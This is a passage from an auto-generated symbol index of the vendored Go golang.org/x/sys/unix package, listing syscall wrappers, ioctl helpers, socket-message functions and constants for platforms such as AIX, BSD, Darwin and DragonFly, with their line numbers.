found bool) { function Setenv (line 17) | func Setenv(key, value string) error { function Clearenv (line 21) | func Clearenv() { function Environ (line 25) | func Environ() []string { function Unsetenv (line 29) | func Unsetenv(key string) error { FILE: vendor/golang.org/x/sys/unix/epoll_zos.go type EpollEvent (line 17) | type EpollEvent struct constant EPOLLERR (line 24) | EPOLLERR = 0x8 constant EPOLLHUP (line 25) | EPOLLHUP = 0x10 constant EPOLLIN (line 26) | EPOLLIN = 0x1 constant EPOLLMSG (line 27) | EPOLLMSG = 0x400 constant EPOLLOUT (line 28) | EPOLLOUT = 0x4 constant EPOLLPRI (line 29) | EPOLLPRI = 0x2 constant EPOLLRDBAND (line 30) | EPOLLRDBAND = 0x80 constant EPOLLRDNORM (line 31) | EPOLLRDNORM = 0x40 constant EPOLLWRBAND (line 32) | EPOLLWRBAND = 0x200 constant EPOLLWRNORM (line 33) | EPOLLWRNORM = 0x100 constant EPOLL_CTL_ADD (line 34) | EPOLL_CTL_ADD = 0x1 constant EPOLL_CTL_DEL (line 35) | EPOLL_CTL_DEL = 0x2 constant EPOLL_CTL_MOD (line 36) | EPOLL_CTL_MOD = 0x3 function epToPollEvt (line 52) | func epToPollEvt(events uint32) int16 { function pToEpollEvt (line 72) | func pToEpollEvt(revents int16) uint32 { type epollImpl (line 92) | type epollImpl struct method epollcreate (line 111) | func (e *epollImpl) epollcreate(size int) (epfd int, err error) { method epollcreate1 (line 123) | func (e *epollImpl) epollcreate1(flag int) (fd int, err error) { method epollctl (line 127) | func (e *epollImpl) epollctl(epfd int, op int, fd int, event *EpollEve... method epollwait (line 169) | func (e *epollImpl) epollwait(epfd int, events []EpollEvent, msec int)... type eventPoll (line 100) | type eventPoll struct method getFds (line 161) | func (ep *eventPoll) getFds() []int { function EpollCreate (line 204) | func EpollCreate(size int) (fd int, err error) { function EpollCreate1 (line 208) | func EpollCreate1(flag int) (fd int, err error) { function EpollCtl (line 212) | func EpollCtl(epfd int, op int, fd int, event *EpollEvent) (err error) { function EpollWait (line 218) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... FILE: vendor/golang.org/x/sys/unix/fcntl.go function fcntl (line 15) | func fcntl(fd int, cmd, arg int) (int, error) { function FcntlInt (line 25) | func FcntlInt(fd uintptr, cmd, arg int) (int, error) { function FcntlFlock (line 30) | func FcntlFlock(fd uintptr, cmd int, lk *Flock_t) error { FILE: vendor/golang.org/x/sys/unix/fcntl_darwin.go function FcntlInt (line 10) | func FcntlInt(fd uintptr, cmd, arg int) (int, error) { function FcntlFlock (line 15) | func FcntlFlock(fd uintptr, cmd int, lk *Flock_t) error { function FcntlFstore (line 21) | func FcntlFstore(fd uintptr, cmd int, fstore *Fstore_t) error { FILE: vendor/golang.org/x/sys/unix/fcntl_linux_32bit.go function init (line 9) | func init() { FILE: vendor/golang.org/x/sys/unix/fdset.go method Set (line 10) | func (fds *FdSet) Set(fd int) { method Clear (line 15) | func (fds *FdSet) Clear(fd int) { method IsSet (line 20) | func (fds *FdSet) IsSet(fd int) bool { method Zero (line 25) | func (fds *FdSet) Zero() { FILE: vendor/golang.org/x/sys/unix/fstatfs_zos.go function Fstatfs (line 15) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function tryGetmntent64 (line 60) | func tryGetmntent64(stat *Statfs_t) (err error) { function tryGetmntent128 (line 81) | func tryGetmntent128(stat *Statfs_t) (err error) { function tryGetmntent256 (line 102) | func tryGetmntent256(stat *Statfs_t) (err error) { function tryGetmntent512 (line 123) | func tryGetmntent512(stat *Statfs_t) (err error) { function tryGetmntent1024 (line 144) | func tryGetmntent1024(stat *Statfs_t) (err error) { FILE: vendor/golang.org/x/sys/unix/gccgo.go function realSyscallNoError (line 14) | func realSyscallNoError(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr... function realSyscall (line 16) | func realSyscall(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r, e... function SyscallNoError (line 18) | func SyscallNoError(trap, a1, a2, a3 uintptr) (r1, r2 uintptr) { function Syscall (line 25) | func Syscall(trap, a1, a2, a3 uintptr) (r1, r2 uintptr, err syscall.Errn... function Syscall6 (line 32) | func Syscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uintptr, err... function Syscall9 (line 39) | func Syscall9(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 ... function RawSyscallNoError (line 46) | func RawSyscallNoError(trap, a1, a2, a3 uintptr) (r1, r2 uintptr) { function RawSyscall (line 51) | func RawSyscall(trap, a1, a2, a3 uintptr) (r1, r2 uintptr, err syscall.E... function RawSyscall6 (line 56) | func RawSyscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uintptr, ... FILE: vendor/golang.org/x/sys/unix/gccgo_c.c type ret (line 18) | struct ret { type ret (line 23) | struct ret function gccgoRealSyscall (line 26) | struct ret function gccgoRealSyscallNoError (line 40) | uintptr_t FILE: vendor/golang.org/x/sys/unix/gccgo_linux_amd64.go function realGettimeofday (line 12) | func realGettimeofday(*Timeval, *byte) int32 function gettimeofday (line 14) | func gettimeofday(tv *Timeval) (err syscall.Errno) { FILE: vendor/golang.org/x/sys/unix/ifreq_linux.go type Ifreq (line 25) | type Ifreq struct method Name (line 45) | func (ifr *Ifreq) Name() string { method Inet4Addr (line 56) | func (ifr *Ifreq) Inet4Addr() ([]byte, error) { method SetInet4Addr (line 69) | func (ifr *Ifreq) SetInet4Addr(v []byte) error { method Uint16 (line 90) | func (ifr *Ifreq) Uint16() uint16 { method SetUint16 (line 95) | func (ifr *Ifreq) SetUint16(v uint16) { method Uint32 (line 101) | func (ifr *Ifreq) Uint32() uint32 { method SetUint32 (line 106) | func (ifr *Ifreq) SetUint32(v uint32) { method clear (line 113) | func (ifr *Ifreq) clear() { method withData (line 136) | func (ifr Ifreq) withData(p unsafe.Pointer) ifreqData { function NewIfreq (line 30) | func NewIfreq(name string) (*Ifreq, error) { type ifreqData (line 124) | type ifreqData struct FILE: vendor/golang.org/x/sys/unix/ioctl_linux.go function IoctlRetInt (line 12) | func IoctlRetInt(fd int, req uint) (int, error) { function IoctlGetUint32 (line 20) | func IoctlGetUint32(fd int, req uint) (uint32, error) { function IoctlGetRTCTime (line 26) | func IoctlGetRTCTime(fd int) (*RTCTime, error) { function IoctlSetRTCTime (line 32) | func IoctlSetRTCTime(fd int, value *RTCTime) error { function IoctlGetRTCWkAlrm (line 36) | func IoctlGetRTCWkAlrm(fd int) (*RTCWkAlrm, error) { function IoctlSetRTCWkAlrm (line 42) | func IoctlSetRTCWkAlrm(fd int, value *RTCWkAlrm) error { function IoctlGetEthtoolDrvinfo (line 48) | func IoctlGetEthtoolDrvinfo(fd int, ifname string) (*EthtoolDrvinfo, err... function IoctlGetWatchdogInfo (line 64) | func IoctlGetWatchdogInfo(fd int) (*WatchdogInfo, error) { function IoctlWatchdogKeepalive (line 73) | func IoctlWatchdogKeepalive(fd int) error { function IoctlFileCloneRange (line 81) | func IoctlFileCloneRange(destFd int, value *FileCloneRange) error { function IoctlFileClone (line 88) | func IoctlFileClone(destFd, srcFd int) error { type FileDedupeRange (line 92) | type FileDedupeRange struct type FileDedupeRangeInfo (line 100) | type FileDedupeRangeInfo struct function IoctlFileDedupeRange (line 112) | func IoctlFileDedupeRange(srcFd int, value *FileDedupeRange) error { function IoctlHIDGetDesc (line 150) | func IoctlHIDGetDesc(fd int, value *HIDRawReportDescriptor) error { function IoctlHIDGetRawInfo (line 154) | func IoctlHIDGetRawInfo(fd int) (*HIDRawDevInfo, error) { function IoctlHIDGetRawName (line 160) | func IoctlHIDGetRawName(fd int) (string, error) { function IoctlHIDGetRawPhys (line 166) | func IoctlHIDGetRawPhys(fd int) (string, error) { function IoctlHIDGetRawUniq (line 172) | func IoctlHIDGetRawUniq(fd int) (string, error) { function IoctlIfreq (line 180) | func IoctlIfreq(fd int, req uint, value *Ifreq) error { function ioctlIfreqData (line 190) | func ioctlIfreqData(fd int, req uint, value *ifreqData) error { function IoctlKCMClone (line 199) | func IoctlKCMClone(fd int) (*KCMClone, error) { function IoctlKCMAttach (line 210) | func IoctlKCMAttach(fd int, info KCMAttach) error { function IoctlKCMUnattach (line 215) | func IoctlKCMUnattach(fd int, info KCMUnattach) error { function IoctlLoopGetStatus64 (line 221) | func IoctlLoopGetStatus64(fd int) (*LoopInfo64, error) { function IoctlLoopSetStatus64 (line 231) | func IoctlLoopSetStatus64(fd int, value *LoopInfo64) error { function IoctlLoopConfigure (line 236) | func IoctlLoopConfigure(fd int, value *LoopConfig) error { FILE: vendor/golang.org/x/sys/unix/ioctl_signed.go function IoctlSetInt (line 18) | func IoctlSetInt(fd int, req int, value int) error { function IoctlSetPointerInt (line 26) | func IoctlSetPointerInt(fd int, req int, value int) error { function IoctlSetWinsize (line 34) | func IoctlSetWinsize(fd int, req int, value *Winsize) error { function IoctlSetTermios (line 43) | func IoctlSetTermios(fd int, req int, value *Termios) error { function IoctlGetInt (line 53) | func IoctlGetInt(fd int, req int) (int, error) { function IoctlGetWinsize (line 59) | func IoctlGetWinsize(fd int, req int) (*Winsize, error) { function IoctlGetTermios (line 65) | func IoctlGetTermios(fd int, req int) (*Termios, error) { FILE: vendor/golang.org/x/sys/unix/ioctl_unsigned.go function IoctlSetInt (line 18) | func IoctlSetInt(fd int, req uint, value int) error { function IoctlSetPointerInt (line 26) | func IoctlSetPointerInt(fd int, req uint, value int) error { function IoctlSetWinsize (line 34) | func IoctlSetWinsize(fd int, req uint, value *Winsize) error { function IoctlSetTermios (line 43) | func IoctlSetTermios(fd int, req uint, value *Termios) error { function IoctlGetInt (line 53) | func IoctlGetInt(fd int, req uint) (int, error) { function IoctlGetWinsize (line 59) | func IoctlGetWinsize(fd int, req uint) (*Winsize, error) { function IoctlGetTermios (line 65) | func IoctlGetTermios(fd int, req uint) (*Termios, error) { FILE: vendor/golang.org/x/sys/unix/ioctl_zos.go function IoctlSetInt (line 19) | func IoctlSetInt(fd int, req int, value int) error { function IoctlSetWinsize (line 26) | func IoctlSetWinsize(fd int, req int, value *Winsize) error { function IoctlSetTermios (line 35) | func IoctlSetTermios(fd int, req int, value *Termios) error { function IoctlGetInt (line 49) | func IoctlGetInt(fd int, req int) (int, error) { function IoctlGetWinsize (line 55) | func IoctlGetWinsize(fd int, req int) (*Winsize, error) { function IoctlGetTermios (line 64) | func IoctlGetTermios(fd int, req int) (*Termios, error) { FILE: vendor/golang.org/x/sys/unix/mremap.go type mremapMmapper (line 11) | type mremapMmapper struct method Mremap (line 25) | func (m *mremapMmapper) Mremap(oldData []byte, newLength int, flags in... function Mremap (line 50) | func Mremap(oldData []byte, newLength int, flags int) (data []byte, err ... FILE: vendor/golang.org/x/sys/unix/pagesize_unix.go function Getpagesize (line 13) | func Getpagesize() int { FILE: vendor/golang.org/x/sys/unix/pledge_openbsd.go function Pledge (line 20) | func Pledge(promises, execpromises string) error { function PledgePromises (line 43) | func PledgePromises(promises string) error { function PledgeExecpromises (line 61) | func PledgeExecpromises(execpromises string) error { function majmin (line 75) | func majmin() (major int, minor int, err error) { function pledgeAvailable (line 99) | func pledgeAvailable() error { FILE: vendor/golang.org/x/sys/unix/ptrace_darwin.go function ptrace (line 9) | func ptrace(request int, pid int, addr uintptr, data uintptr) error { FILE: vendor/golang.org/x/sys/unix/ptrace_ios.go function ptrace (line 9) | func ptrace(request int, pid int, addr uintptr, data uintptr) (err error) { FILE: vendor/golang.org/x/sys/unix/race.go constant raceenabled (line 14) | raceenabled = true function raceAcquire (line 16) | func raceAcquire(addr unsafe.Pointer) { function raceReleaseMerge (line 20) | func raceReleaseMerge(addr unsafe.Pointer) { function raceReadRange (line 24) | func raceReadRange(addr unsafe.Pointer, len int) { function raceWriteRange (line 28) | func raceWriteRange(addr unsafe.Pointer, len int) { FILE: vendor/golang.org/x/sys/unix/race0.go constant raceenabled (line 13) | raceenabled = false function raceAcquire (line 15) | func raceAcquire(addr unsafe.Pointer) { function raceReleaseMerge (line 18) | func raceReleaseMerge(addr unsafe.Pointer) { function raceReadRange (line 21) | func raceReadRange(addr unsafe.Pointer, len int) { function raceWriteRange (line 24) | func raceWriteRange(addr unsafe.Pointer, len int) { FILE: vendor/golang.org/x/sys/unix/readdirent_getdents.go function ReadDirent (line 10) | func ReadDirent(fd int, buf []byte) (n int, err error) { FILE: vendor/golang.org/x/sys/unix/readdirent_getdirentries.go function ReadDirent (line 12) | func ReadDirent(fd int, buf []byte) (n int, err error) { FILE: vendor/golang.org/x/sys/unix/sockcmsg_dragonfly.go function cmsgAlignOf (line 8) | func cmsgAlignOf(salen int) int { FILE: vendor/golang.org/x/sys/unix/sockcmsg_linux.go function UnixCredentials (line 14) | func UnixCredentials(ucred *Ucred) []byte { function ParseUnixCredentials (line 27) | func ParseUnixCredentials(m *SocketControlMessage) (*Ucred, error) { function PktInfo4 (line 39) | func PktInfo4(info *Inet4Pktinfo) []byte { function PktInfo6 (line 50) | func PktInfo6(info *Inet6Pktinfo) []byte { function ParseOrigDstAddr (line 63) | func ParseOrigDstAddr(m *SocketControlMessage) (Sockaddr, error) { FILE: vendor/golang.org/x/sys/unix/sockcmsg_unix.go function CmsgLen (line 17) | func CmsgLen(datalen int) int { function CmsgSpace (line 23) | func CmsgSpace(datalen int) int { method data (line 27) | func (h *Cmsghdr) data(offset uintptr) unsafe.Pointer { type SocketControlMessage (line 32) | type SocketControlMessage struct function ParseSocketControlMessage (line 39) | func ParseSocketControlMessage(b []byte) ([]SocketControlMessage, error) { function ParseOneSocketControlMessage (line 57) | func ParseOneSocketControlMessage(b []byte) (hdr Cmsghdr, data []byte, r... function socketControlMessageHeaderAndData (line 68) | func socketControlMessageHeaderAndData(b []byte) (*Cmsghdr, []byte, erro... function UnixRights (line 78) | func UnixRights(fds ...int) []byte { function ParseUnixRights (line 93) | func ParseUnixRights(m *SocketControlMessage) ([]int, error) { FILE: vendor/golang.org/x/sys/unix/sockcmsg_unix_other.go function cmsgAlignOf (line 14) | func cmsgAlignOf(salen int) int { FILE: vendor/golang.org/x/sys/unix/syscall.go function ByteSliceFromString (line 36) | func ByteSliceFromString(s string) ([]byte, error) { function BytePtrFromString (line 48) | func BytePtrFromString(s string) (*byte, error) { function ByteSliceToString (line 58) | func ByteSliceToString(s []byte) string { function BytePtrToString (line 68) | func BytePtrToString(p *byte) string { FILE: vendor/golang.org/x/sys/unix/syscall_aix.go function Access (line 22) | func Access(path string, mode uint32) (err error) { function Chmod (line 26) | func Chmod(path string, mode uint32) (err error) { function Chown (line 30) | func Chown(path string, uid int, gid int) (err error) { function Creat (line 34) | func Creat(path string, mode uint32) (fd int, err error) { function Utimes (line 40) | func Utimes(path string, tv []Timeval) error { function UtimesNano (line 49) | func UtimesNano(path string, ts []Timespec) error { function UtimesNanoAt (line 56) | func UtimesNanoAt(dirfd int, path string, ts []Timespec, flags int) error { method sockaddr (line 66) | func (sa *SockaddrInet4) sockaddr() (unsafe.Pointer, _Socklen, error) { method sockaddr (line 78) | func (sa *SockaddrInet6) sockaddr() (unsafe.Pointer, _Socklen, error) { method sockaddr (line 91) | func (sa *SockaddrUnix) sockaddr() (unsafe.Pointer, _Socklen, error) { function Getsockname (line 119) | func Getsockname(fd int) (sa Sockaddr, err error) { constant ImplementsGetwd (line 130) | ImplementsGetwd = true function Getwd (line 132) | func Getwd() (ret string, err error) { function Getcwd (line 149) | func Getcwd(buf []byte) (n int, err error) { function Getgroups (line 161) | func Getgroups() (gids []int, err error) { function Setgroups (line 187) | func Setgroups(gids []int) (err error) { function Accept (line 205) | func Accept(fd int) (nfd int, sa Sockaddr, err error) { function recvmsgRaw (line 220) | func recvmsgRaw(fd int, iov []Iovec, oob []byte, flags int, rsa *RawSock... function sendmsgN (line 248) | func sendmsgN(fd int, iov []Iovec, oob []byte, ptr unsafe.Pointer, salen... function anyToSockaddr (line 279) | func anyToSockaddr(fd int, rsa *RawSockaddrAny) (Sockaddr, error) { function Gettimeofday (line 318) | func Gettimeofday(tv *Timeval) (err error) { function Sendfile (line 323) | func Sendfile(outfd int, infd int, offset *int64, count int) (written in... function sendfile (line 331) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function direntIno (line 335) | func direntIno(buf []byte) (uint64, bool) { function direntReclen (line 339) | func direntReclen(buf []byte) (uint64, bool) { function direntNamlen (line 343) | func direntNamlen(buf []byte) (uint64, bool) { function Getdents (line 353) | func Getdents(fd int, buf []byte) (n int, err error) { function Wait4 (line 359) | func Wait4(pid int, wstatus *WaitStatus, options int, rusage *Rusage) (w... type WaitStatus (line 379) | type WaitStatus method Stopped (line 381) | func (w WaitStatus) Stopped() bool { return w&0x40 != 0 } method StopSignal (line 382) | func (w WaitStatus) StopSignal() Signal { method Exited (line 389) | func (w WaitStatus) Exited() bool { return w&0xFF == 0 } method ExitStatus (line 390) | func (w WaitStatus) ExitStatus() int { method Signaled (line 397) | func (w WaitStatus) Signaled() bool { return w&0x40 == 0 && w&0xFF != 0 } method Signal (line 398) | func (w WaitStatus) Signal() Signal { method Continued (line 405) | func (w WaitStatus) Continued() bool { return w&0x01000000 != 0 } method CoreDump (line 407) | func (w WaitStatus) CoreDump() bool { return w&0x80 == 0x80 } method TrapCause (line 409) | func (w WaitStatus) TrapCause() int { return -1 } function Fsync (line 428) | func Fsync(fd int) error { function Pipe (line 546) | func Pipe(p []int) (err error) { function Poll (line 561) | func Poll(fds []PollFd, timeout int) (n int, err error) { function Unmount (line 576) | func Unmount(target string, flags int) (err error) { FILE: vendor/golang.org/x/sys/unix/syscall_aix_ppc.go function setTimespec (line 14) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 18) | func setTimeval(sec, usec int64) Timeval { method SetLen (line 22) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 26) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 30) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 34) | func (cmsg *Cmsghdr) SetLen(length int) { function Fstat (line 38) | func Fstat(fd int, stat *Stat_t) error { function Fstatat (line 42) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) error { function Lstat (line 46) | func Lstat(path string, stat *Stat_t) error { function Stat (line 50) | func Stat(path string, statptr *Stat_t) error { FILE: vendor/golang.org/x/sys/unix/syscall_aix_ppc64.go function setTimespec (line 14) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 18) | func setTimeval(sec, usec int64) Timeval { method SetLen (line 22) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 26) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 30) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 34) | func (cmsg *Cmsghdr) SetLen(length int) { function fixStatTimFields (line 43) | func fixStatTimFields(stat *Stat_t) { function Fstat (line 49) | func Fstat(fd int, stat *Stat_t) error { function Fstatat (line 58) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) error { function Lstat (line 67) | func Lstat(path string, stat *Stat_t) error { function Stat (line 76) | func Stat(path string, statptr *Stat_t) error { FILE: vendor/golang.org/x/sys/unix/syscall_bsd.go constant ImplementsGetwd (line 21) | ImplementsGetwd = true function Getwd (line 23) | func Getwd() (string, error) { function Getgroups (line 43) | func Getgroups() (gids []int, err error) { function Setgroups (line 69) | func Setgroups(gids []int) (err error) { type WaitStatus (line 87) | type WaitStatus method Exited (line 99) | func (w WaitStatus) Exited() bool { return w&mask == exited } method ExitStatus (line 101) | func (w WaitStatus) ExitStatus() int { method Signaled (line 108) | func (w WaitStatus) Signaled() bool { return w&mask != stopped && w&ma... method Signal (line 110) | func (w WaitStatus) Signal() syscall.Signal { method CoreDump (line 118) | func (w WaitStatus) CoreDump() bool { return w.Signaled() && w&core !=... method Stopped (line 120) | func (w WaitStatus) Stopped() bool { return w&mask == stopped && sysca... method Killed (line 122) | func (w WaitStatus) Killed() bool { return w&mask == killed && syscall... method Continued (line 124) | func (w WaitStatus) Continued() bool { return w&mask == stopped && sys... method StopSignal (line 126) | func (w WaitStatus) StopSignal() syscall.Signal { method TrapCause (line 133) | func (w WaitStatus) TrapCause() int { return -1 } constant mask (line 90) | mask = 0x7F constant core (line 91) | core = 0x80 constant shift (line 92) | shift = 8 constant exited (line 94) | exited = 0 constant killed (line 95) | killed = 9 constant stopped (line 96) | stopped = 0x7F function Wait4 (line 137) | func Wait4(pid int, wstatus *WaitStatus, options int, rusage *Rusage) (w... method sockaddr (line 156) | func (sa *SockaddrInet4) sockaddr() (unsafe.Pointer, _Socklen, error) { method sockaddr (line 169) | func (sa *SockaddrInet6) sockaddr() (unsafe.Pointer, _Socklen, error) { method sockaddr (line 183) | func (sa *SockaddrUnix) sockaddr() (unsafe.Pointer, _Socklen, error) { method sockaddr (line 197) | func (sa *SockaddrDatalink) sockaddr() (unsafe.Pointer, _Socklen, error) { function anyToSockaddr (line 212) | func anyToSockaddr(fd int, rsa *RawSockaddrAny) (Sockaddr, error) { function Accept (line 270) | func Accept(fd int) (nfd int, sa Sockaddr, err error) { function Getsockname (line 293) | func Getsockname(fd int) (sa Sockaddr, err error) { function GetsockoptString (line 312) | func GetsockoptString(fd, level, opt int) (string, error) { function recvmsgRaw (line 326) | func recvmsgRaw(fd int, iov []Iovec, oob []byte, flags int, rsa *RawSock... function sendmsgN (line 356) | func sendmsgN(fd int, iov []Iovec, oob []byte, ptr unsafe.Pointer, salen... function Kevent (line 389) | func Kevent(kq int, changes, events []Kevent_t, timeout *Timespec) (n in... function sysctlmib (line 401) | func sysctlmib(name string, args ...int) ([]_C_int, error) { function Sysctl (line 415) | func Sysctl(name string) (string, error) { function SysctlArgs (line 419) | func SysctlArgs(name string, args ...int) (string, error) { function SysctlUint32 (line 433) | func SysctlUint32(name string) (uint32, error) { function SysctlUint32Args (line 437) | func SysctlUint32Args(name string, args ...int) (uint32, error) { function SysctlUint64 (line 454) | func SysctlUint64(name string, args ...int) (uint64, error) { function SysctlRaw (line 471) | func SysctlRaw(name string, args ...int) ([]byte, error) { function SysctlClockinfo (line 497) | func SysctlClockinfo(name string) (*Clockinfo, error) { function SysctlTimeval (line 514) | func SysctlTimeval(name string) (*Timeval, error) { function Utimes (line 533) | func Utimes(path string, tv []Timeval) error { function UtimesNano (line 543) | func UtimesNano(path string, ts []Timespec) error { function UtimesNanoAt (line 567) | func UtimesNanoAt(dirfd int, path string, ts []Timespec, flags int) error { function Futimes (line 579) | func Futimes(fd int, tv []Timeval) error { function Poll (line 591) | func Poll(fds []PollFd, timeout int) (n int, err error) { FILE: vendor/golang.org/x/sys/unix/syscall_darwin.go function fdopendir (line 24) | func fdopendir(fd int) (dir uintptr, err error) { function Getdirentries (line 37) | func Getdirentries(fd int, buf []byte, basep *uintptr) (n int, err error) { type SockaddrDatalink (line 112) | type SockaddrDatalink struct type SockaddrCtl (line 125) | type SockaddrCtl struct method sockaddr (line 131) | func (sa *SockaddrCtl) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrVM (line 144) | type SockaddrVM struct method sockaddr (line 155) | func (sa *SockaddrVM) sockaddr() (unsafe.Pointer, _Socklen, error) { function anyToSockaddrGOOS (line 164) | func anyToSockaddrGOOS(fd int, rsa *RawSockaddrAny) (Sockaddr, error) { constant SYS___SYSCTL (line 188) | SYS___SYSCTL = SYS_SYSCTL function nametomib (line 191) | func nametomib(name string) (mib []_C_int, err error) { function direntIno (line 218) | func direntIno(buf []byte) (uint64, bool) { function direntReclen (line 222) | func direntReclen(buf []byte) (uint64, bool) { function direntNamlen (line 226) | func direntNamlen(buf []byte) (uint64, bool) { function PtraceAttach (line 230) | func PtraceAttach(pid int) (err error) { return ptrace(PT_ATTACH, pid, 0... function PtraceDetach (line 231) | func PtraceDetach(pid int) (err error) { return ptrace(PT_DETACH, pid, 0... function PtraceDenyAttach (line 232) | func PtraceDenyAttach() (err error) { return ptrace(PT_DENY_ATTACH, 0... function Pipe (line 236) | func Pipe(p []int) (err error) { function Getfsstat (line 249) | func Getfsstat(buf []Statfs_t, flags int) (n int, err error) { function xattrPointer (line 259) | func xattrPointer(dest []byte) *byte { function Getxattr (line 274) | func Getxattr(path string, attr string, dest []byte) (sz int, err error) { function Lgetxattr (line 278) | func Lgetxattr(link string, attr string, dest []byte) (sz int, err error) { function Fgetxattr (line 284) | func Fgetxattr(fd int, attr string, dest []byte) (sz int, err error) { function Setxattr (line 290) | func Setxattr(path string, attr string, data []byte, flags int) (err err... function Lsetxattr (line 320) | func Lsetxattr(link string, attr string, data []byte, flags int) (err er... function Fsetxattr (line 326) | func Fsetxattr(fd int, attr string, data []byte, flags int) (err error) { function Removexattr (line 332) | func Removexattr(path string, attr string) (err error) { function Lremovexattr (line 339) | func Lremovexattr(link string, attr string) (err error) { function Fremovexattr (line 345) | func Fremovexattr(fd int, attr string) (err error) { function Listxattr (line 351) | func Listxattr(path string, dest []byte) (sz int, err error) { function Llistxattr (line 355) | func Llistxattr(link string, dest []byte) (sz int, err error) { function Flistxattr (line 361) | func Flistxattr(fd int, dest []byte) (sz int, err error) { function Kill (line 375) | func Kill(pid int, signum syscall.Signal) (err error) { return kill(pid,... function IoctlCtlInfo (line 380) | func IoctlCtlInfo(fd int, ctlInfo *CtlInfo) error { type IfreqMTU (line 385) | type IfreqMTU struct function IoctlGetIfreqMTU (line 392) | func IoctlGetIfreqMTU(fd int, ifname string) (*IfreqMTU, error) { function IoctlSetIfreqMTU (line 401) | func IoctlSetIfreqMTU(fd int, ifreq *IfreqMTU) error { function Uname (line 407) | func Uname(uname *Utsname) error { function Sendfile (line 453) | func Sendfile(outfd int, infd int, offset *int64, count int) (written in... function GetsockoptIPMreqn (line 463) | func GetsockoptIPMreqn(fd, level, opt int) (*IPMreqn, error) { function SetsockoptIPMreqn (line 470) | func SetsockoptIPMreqn(fd, level, opt int, mreq *IPMreqn) (err error) { function GetsockoptXucred (line 476) | func GetsockoptXucred(fd, level, opt int) (*Xucred, error) { function GetsockoptTCPConnectionInfo (line 483) | func GetsockoptTCPConnectionInfo(fd, level, opt int) (*TCPConnectionInfo... function SysctlKinfoProc (line 490) | func SysctlKinfoProc(name string, args ...int) (*KinfoProc, error) { function SysctlKinfoProcSlice (line 507) | func SysctlKinfoProcSlice(name string, args ...int) ([]KinfoProc, error) { FILE: vendor/golang.org/x/sys/unix/syscall_darwin_amd64.go function setTimespec (line 11) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 15) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 19) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 25) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 29) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 33) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 37) | func (cmsg *Cmsghdr) SetLen(length int) { function Syscall9 (line 41) | func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 u... FILE: vendor/golang.org/x/sys/unix/syscall_darwin_arm64.go function setTimespec (line 11) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 15) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 19) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 25) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 29) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 33) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 37) | func (cmsg *Cmsghdr) SetLen(length int) { function Syscall9 (line 41) | func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 u... FILE: vendor/golang.org/x/sys/unix/syscall_darwin_libSystem.go function syscall_syscall (line 12) | func syscall_syscall(fn, a1, a2, a3 uintptr) (r1, r2 uintptr, err Errno) function syscall_syscall6 (line 13) | func syscall_syscall6(fn, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uintpt... function syscall_syscall6X (line 14) | func syscall_syscall6X(fn, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uintp... function syscall_syscall9 (line 15) | func syscall_syscall9(fn, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r... function syscall_rawSyscall (line 16) | func syscall_rawSyscall(fn, a1, a2, a3 uintptr) (r1, r2 uintptr, err Errno) function syscall_rawSyscall6 (line 17) | func syscall_rawSyscall6(fn, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uin... function syscall_syscallPtr (line 18) | func syscall_syscallPtr(fn, a1, a2, a3 uintptr) (r1, r2 uintptr, err Errno) FILE: vendor/golang.org/x/sys/unix/syscall_dragonfly.go constant _dragonflyABIChangeVersion (line 28) | _dragonflyABIChangeVersion = 500705 function supportsABI (line 30) | func supportsABI(ver uint32) bool { type SockaddrDatalink (line 36) | type SockaddrDatalink struct function anyToSockaddrGOOS (line 50) | func anyToSockaddrGOOS(fd int, rsa *RawSockaddrAny) (Sockaddr, error) { function nametomib (line 55) | func nametomib(name string) (mib []_C_int, err error) { function direntIno (line 82) | func direntIno(buf []byte) (uint64, bool) { function direntReclen (line 86) | func direntReclen(buf []byte) (uint64, bool) { function direntNamlen (line 94) | func direntNamlen(buf []byte) (uint64, bool) { function Pipe (line 100) | func Pipe(p []int) (err error) { function Pipe2 (line 113) | func Pipe2(p []int, flags int) (err error) { function pread (line 129) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 135) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Accept4 (line 139) | func Accept4(fd, flags int) (nfd int, sa Sockaddr, err error) { function Getfsstat (line 159) | func Getfsstat(buf []Statfs_t, flags int) (n int, err error) { function sysctlUname (line 179) | func sysctlUname(mib []_C_int, old *byte, oldlen *uintptr) error { function Uname (line 192) | 